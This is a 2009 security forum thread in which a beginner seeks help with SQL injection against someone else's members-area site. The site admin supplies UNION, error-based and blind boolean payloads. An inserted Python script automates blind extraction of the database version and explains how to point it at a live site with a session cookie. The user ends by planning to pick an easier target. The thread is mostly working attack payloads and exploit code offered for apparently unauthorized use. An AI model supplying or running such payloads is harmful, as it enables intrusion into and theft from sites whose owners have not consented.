Waraxe IT Security Portal
sql injection help please
Posted: Thu Jun 04, 2009 3:25 pm
RubberDoll (Active user; joined Jun 04, 2009; 46 posts)

Hello waraxe,
and thank you and others as knowledgeable for offering your help in so many cases. I've been reading topics here as a guest for a long time :)
Sorry for picking a stupid topic name; I'm a noob and I didn't know how to be more specific.

I'm pretty new to injections and I'm stuck at this error, not knowing how to move on.
I'm assuming the site is vulnerable because it does reply with an SQL error, but I have no idea how to go from here.

id=20477+order+by+1--
no error, and the page displayed fine

id=20477+order+by+2--
Quote:
MySQL error occured on line 380.
Error 1054: Unknown column '2' in 'order clause'

I did discover, though, that when I tried
?id=20477+order+by+13--
the SQL error changed:
Quote:
MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1054: Unknown column '13' in 'order clause'
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=20477 order by 13-- and aw_d1_gal_cat.extid=aw_gal_content.cid

I also tried
id=null%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12--
Quote:
Error 1222: The used SELECT statements have a different number of columns

while ?id=null%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--
results in the long syntax error as above.

I assume 12 columns would be the correct guess, despite the error message, but I don't know how to find the vulnerable column in this case, or whether it is even possible to go further with this.

Thank you
Posted: Thu Jun 04, 2009 7:55 pm
waraxe (Site admin; joined May 11, 2004; 2407 posts; Tartu, Estonia)

The affected parameter (id) is used in multiple different SQL queries, and they need different column counts. Try this:

Code:
id=-1+UNION+ALL+SELECT+12345--+

... and search for "12345" in the response page's HTML source.
If you can't get visual feedback, then the next option is error-based feedback.
Try this:

Code:
?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
Posted: Fri Jun 05, 2009 3:53 am
RubberDoll (Active user; joined Jun 04, 2009; 46 posts)

Thank you, waraxe

id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
blank page with:
Quote:
item not found.

?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
Quote:
MySQL error occured on line 94 in file c:\ZendProject/ZendProject_c/view-94.php.src.
Error 1242: Subquery returns more than 1 row
Query: SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 OR IF(1,(SELECT 1 UNION ALL SELECT 1),0)-- and aw_d1_gal_cat.extid=aw_gal_content.cid

By the way, the site is an internet site and not on my machine, despite the local path shown in the error, and it is inside the members' area.
Posted: Fri Jun 05, 2009 8:41 am
waraxe (Site admin; joined May 11, 2004; 2407 posts; Tartu, Estonia)

This means that you can use blind SQL injection methods. Still, are you sure that you don't have usable visual feedback?

Try:

Code:
id=12000%2b345

Now look at the response page: do you see the text "12345" somewhere?
Another test:

Code:
id=-1+UNION+ALL+SELECT+0x4142434445--+

And look for the text "ABCDE".
By the way, for best results look at the HTML source and search for those text markers there too!

Now, if you tried this and did not get easy-to-use visual feedback, then you have to use blind injection methods. It means asking the target server boolean questions and getting data back bit by bit. Manual blind injection exploitation is time-consuming and error-prone, so I would recommend automated tools or scripts for this.
Posted: Sat Jun 06, 2009 9:50 am
RubberDoll (Active user; joined Jun 04, 2009; 46 posts)

Yep, I'm completely sure I have no better visual feedback in the source.
Also, there's no malformed page with these errors; only the error string is displayed by itself.

id=12000%2b345

Code:
item not found.

That's the source.

id=-1+UNION+ALL+SELECT+0x4142434445--+
source of reply:
Code:

<b>MySQL</b> error occured on line <u>94</u> in file <u>c:\ZendProject/ZendProject_c/view-94.php.src</u>.<br><b>Error 1222:</b> <u>The used SELECT statements have a different number of columns</u><br><b>Query:</b> <u>SELECT aw_d1_gal_cat.parent_line, aw_d1_gal_cat.date, aw_d1_gal_cat.name, aw_d1_gal_cat.descr, aw_d1_gal_cat.descr2, aw_d1_gal_cat.descr3, aw_d1_gal_cat.descr4, aw_d1_gal_cat.descr5, aw_d1_gal_cat.id, aw_d1_gal_cat.extid, aw_d1_gal_cat.parent, aw_d1_gal_cat.trial FROM aw_gal_content, aw_d1_gal_cat WHERE aw_gal_content.id=-1 UNION ALL SELECT 0x4142434445-- and aw_d1_gal_cat.extid=aw_gal_content.cid</u>


Could I ask if there's any automated tool to perform the bit-by-bit injection?
And what exactly would I need to do to make it manually? I might give it a try little by little if nothing else is possible.

I also wanted to ask, with your permission, what exactly I was 'telling' the server in these strings from your earlier reply:

?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+

Lastly, I can PM you the login info and site URL if you think that looking directly might help.

Thanks again :)
Posted: Sat Jun 06, 2009 12:44 pm
waraxe (Site admin; joined May 11, 2004; 2407 posts; Tartu, Estonia)

Search Google for blind SQL injection tools:

http://www.google.ee/search?hl=et&q=blind+sql+injection+tool&btnG=Google+otsing&lr=&aq=f&oq=

Do you know C/C++/PHP/Perl/Python/Ruby or another programming language? If you do, then it's not hard to write your own exploit script/program.

Code:
?id=-1+OR+IF(0,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(1,(SELECT+1+UNION+ALL+SELECT+1),0)--+

The SQL injection exploitation method above is based on inducing SQL errors.
Depending on boolean true or false, the IF() construction returns either a two-row subquery of ones or just zero. In the case of two rows you get a nice SQL error message about the subquery returning more than one row. In this way, depending on the server response, the attacker can distinguish between boolean true and false.
Example, which involves @@version:

Code:
?id=-1+OR+IF(LENGTH(@@version)<1,(SELECT+1+UNION+ALL+SELECT+1),0)--+
?id=-1+OR+IF(LENGTH(@@version)>0,(SELECT+1+UNION+ALL+SELECT+1),0)--+

Same example with a different error-inducing method:

Code:
?id=0%2bIF(LENGTH(@@version)<1,20477,0)
?id=0%2bIF(LENGTH(@@version)>0,20477,0)

The method above does not generate SQL errors, which is generally good in real-world attack scenarios.
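As an added example (not code from the thread, from waraxe or from the target site), here is the kind of exploit script waraxe's second and third replies describe: it asks the target boolean questions and pulls @@version back one character at a time, using both oracles from the thread, the Error 1242 subquery trick and the error-free 0+IF(...,20477,0) arithmetic. Nothing here talks to a real host: the target is a constructed stand-in that imitates how view-94.php answered in this thread ("item not found.", the normal item page, or the Error 1242 message). Its @@version string is made up; only KNOWN_ID 20477 and the payload shapes come from the posts. Against a real target, fake_target would be replaced by an HTTP fetch carrying the members-area session cookie.

```python
"""Boolean-based blind SQL injection through one integer parameter (added example).

Two yes/no oracles taken from the thread:
  error-based : id=-1 OR IF(<cond>,(SELECT 1 UNION ALL SELECT 1),0)--  -> "Error 1242" iff <cond>
  error-free  : id=0+IF(<cond>,20477,0)                                 -> real item page iff <cond>
Each request answers one boolean question; @@version is recovered with a binary
search on LENGTH(@@version), then on ORD(SUBSTRING(@@version,pos,1)) per position.
The target below is a constructed stand-in for view-94.php, not a real server.
"""
import re
from urllib.parse import quote_plus

KNOWN_ID = 20477                      # id of a real item, taken from the thread
SECRET_VERSION = "5.0.51a-community"  # constructed: the fake server's @@version

# ------------------------------------------------------------ constructed target
_LEN = re.compile(r"^LENGTH\(@@version\)([<>=])(\d+)$")
_ORD = re.compile(r"^ORD\(SUBSTRING\(@@version,(\d+),1\)\)([<>=])(\d+)$")
_ERR_SHAPE = re.compile(r"^-1 OR IF\((.+),\(SELECT 1 UNION ALL SELECT 1\),0\)-- $")
_ARITH_SHAPE = re.compile(r"^0\+IF\((.+),%d,0\)$" % KNOWN_ID)

ITEM_PAGE = "<html><body><h1>Gallery item %d</h1></body></html>" % KNOWN_ID
NOT_FOUND = "item not found."
ERROR_1242 = ("<b>MySQL</b> error occured on line <u>94</u>.<br>"
              "<b>Error 1242:</b> <u>Subquery returns more than 1 row</u>")


def _eval_cond(cond):
    """Evaluate the two condition shapes the extractor emits, with MySQL semantics
    (SUBSTRING past the end yields '' and ORD('') is 0)."""
    m = _LEN.match(cond)
    if m:
        lhs, op, rhs = len(SECRET_VERSION), m.group(1), int(m.group(2))
    else:
        m = _ORD.match(cond)
        if not m:
            raise ValueError("fake target does not understand: " + cond)
        pos, op, rhs = int(m.group(1)), m.group(2), int(m.group(3))
        lhs = ord(SECRET_VERSION[pos - 1]) if 1 <= pos <= len(SECRET_VERSION) else 0
    return {"<": lhs < rhs, ">": lhs > rhs, "=": lhs == rhs}[op]


def fake_target(id_value):
    """Behaves like 'WHERE aw_gal_content.id=<id_value>' for the payload shapes used here."""
    if id_value == str(KNOWN_ID):
        return ITEM_PAGE
    m = _ERR_SHAPE.match(id_value)
    if m:  # IF(true) -> two-row subquery in scalar context -> MySQL error 1242
        return ERROR_1242 if _eval_cond(m.group(1)) else NOT_FOUND
    m = _ARITH_SHAPE.match(id_value)
    if m:  # IF(true) -> 0+20477 -> the real item's page; IF(false) -> id 0 -> nothing
        return ITEM_PAGE if _eval_cond(m.group(1)) else NOT_FOUND
    return NOT_FOUND


# --------------------------------------------------------------- attacker side
def to_url(payload):
    """Raw payload as it goes on the wire (quote_plus: space -> '+', '+' -> '%2B')."""
    return "?id=" + quote_plus(payload)


def make_error_oracle(send):
    """cond is true iff the response carries 'Subquery returns more than 1 row'."""
    return lambda cond: "Error 1242" in send(
        "-1 OR IF(%s,(SELECT 1 UNION ALL SELECT 1),0)-- " % cond)


def make_arith_oracle(send):
    """cond is true iff the response equals the page of a known-good id.
    No SQL error is raised, so nothing is written to the server's error log."""
    baseline = send(str(KNOWN_ID))
    return lambda cond: send("0+IF(%s,%d,0)" % (cond, KNOWN_ID)) == baseline


def _bsearch(greater_than, lo, hi):
    """Smallest v in [lo, hi] with not greater_than(v), i.e. the hidden value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_version(oracle, max_len=64):
    """Recover @@version one character at a time; returns (version, requests_sent)."""
    sent = [0]

    def ask(cond):
        sent[0] += 1
        return oracle(cond)

    length = _bsearch(lambda m: ask("LENGTH(@@version)>%d" % m), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = _bsearch(lambda m: ask("ORD(SUBSTRING(@@version,%d,1))>%d" % (pos, m)), 0, 255)
        chars.append(chr(code))
    return "".join(chars), sent[0]


if __name__ == "__main__":
    for name, make in (("error-based", make_error_oracle), ("error-free", make_arith_oracle)):
        version, n = extract_version(make(fake_target))
        print("%-12s %s  (%d requests)" % (name, version, n))
    print(to_url("0+IF(LENGTH(@@version)>0,%d,0)" % KNOWN_ID))
```

Each request yields one bit, so a run costs eight requests per character plus a handful for the length, which is why waraxe recommends scripting it rather than working by hand. The error-free oracle compares whole responses against a baseline page; on a real site any per-request dynamic content (timestamps, session tokens, hit counters) has to be stripped or a stable marker compared instead, or every answer comes back "false".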
Posted: Sun Jun 07, 2009 6:03 am
RubberDoll (Active user; joined Jun 04, 2009; 46 posts)

Thank you, waraxe. I did find a Windows tool (Absinthe) that also supports login (since the vulnerable script is in the members' area), but it does not support MySQL.

Unfortunately, I have no knowledge of programming, nothing at all.

Perhaps I'm aiming too high trying this site, and I should move on and find a more "common" target.
Thanks for your time :)